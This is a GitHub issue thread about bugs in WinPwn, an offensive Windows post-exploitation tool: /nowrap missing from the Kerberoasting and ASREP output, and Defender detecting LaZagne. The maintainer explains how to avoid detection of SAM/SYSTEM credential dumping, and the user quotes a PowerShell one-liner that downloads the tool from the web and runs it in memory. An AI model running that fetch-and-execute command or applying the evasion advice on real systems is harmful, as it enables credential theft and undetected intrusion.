/nowrap nomore!

[sp00ks-git]

Could you re-add /nowrap to the ASREP and Kerberaosting options please! Seems to of gone on at least the offline version.

I find the offline version very useful and use it more often as limited access to the internet is a usual position I'm in.

Thanks!

[S3cur3Th1sSh1t]

Whoops I‘ll add it again. Domainpasswordspray is also broken atm. Gonna do that tomorrow 👌

[S3cur3Th1sSh1t]

Give e9db01a3f0b8479570e076140d2ac1134766bfde a try and tell me if its fixed. LaZagne is also replaced, but its signature won´t last long as always with public tools. It´s better to build your own customized version.

[sp00ks-git]

Thanks man.

[sp00ks-git]

Just tested on a win10 box and its detected immediately by Defender. See screenshot attached. Interesting that is more about behaviour than the file itself. This is a similar message im getting for my custom mimikataz file. Maybe they have updated defender to look more on behaviour.

[S3cur3Th1sSh1t]

One of the first things Lazagne does with the "all" parameter is dumping SAM and SYSTEM hives from the registry to get the SAM-Database credentials. Maybe that is detected, I found many AV/EDR vendors looking for that behaviour in the past. The only method to avoid the detection is to remove the SAM/SYSTEM dump from LaZagne and use for example InternalMonologue for the hashes instead. But I´ll leave that up to you ;-)

[sp00ks-git]

Thanks for the support all good now. Can confirm that /nowrap is sorted also.

[sp00ks-git]

Yo! Just rechecked option 8 from the menu for kerberoasting and the output loses the /nowrap again, can you update?

For clarity: I downloaded winpwn in memory using: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') Selected Option: 8 viewed output: "Kerberoasting_Rubeus.txt"

[S3cur3Th1sSh1t]

Fixed with 3ab6c6c0fcc91f8f98ed2df1de17c7a0592342fb. Only fixed it for the Offline version last time.